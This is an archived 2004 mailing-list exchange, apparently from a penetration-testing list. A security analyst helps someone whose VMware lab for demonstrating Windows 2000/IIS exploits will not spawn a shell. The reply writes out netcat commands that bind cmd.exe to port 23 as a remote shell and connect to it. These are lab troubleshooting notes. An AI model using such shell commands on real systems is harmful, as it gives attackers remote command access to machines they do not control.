From: Grissett, Chris CONT Ciber (Chris.Grissett.Ciberusarc-emh2.army.mil)
Date: Fri Jun 11 2004 - 09:59:03 CDT

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

I guess I should have included a working example:

Assuming that you already have nc on the 2000 box, run this command:

nc -l -p 23 -t -e cmd.exe

Then on your xp box run this command:

nc xxx.xxx.xxx.xxx 23

replace the x's with the ip of the 2000 server box. The 23 is for the port
you assigned it earlier.

Oh, when you installed 2000 server, what type of connection did you choose.
You should choose to have 2000 server have direct access to the host's
Ethernet card and its connections. Do you have any personal firewalls
running at all? Are these two machines connected via a hub or switch.

Christopher Grissett
Security Analyst
Network Enterprise Security Team

-----Original Message-----
From: raza sharif [mailto:razaraza.demon.co.uk]
Sent: Friday, June 11, 2004 7:42 AM
To: pen-testsecurityfocus.com
Subject: Hacking Demo and Test Lab

Hi Folks ,

Im doing some advanced Hacking Demos for management and also Corporates etc.

I have a installed windows 2000 server and iis 5.0 on VMWARE GSX server.

Im using Webdav and other exploits that all basically should spawn a shell
using netcat.

Im using XP as my attacking machine.

Prob at the moment is Netcat will not spawn a shell regardless of what i
try.

Any ideas ? i checked the install it is windows 2000 500.1295 no reference
to service packs etc. it's a default install.

Also what are good demo's etc to run to show real hacking on windows 2000 ,
iis etc..that i can get to work

thanks

Raza

Razaraza.demon.co.uk

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]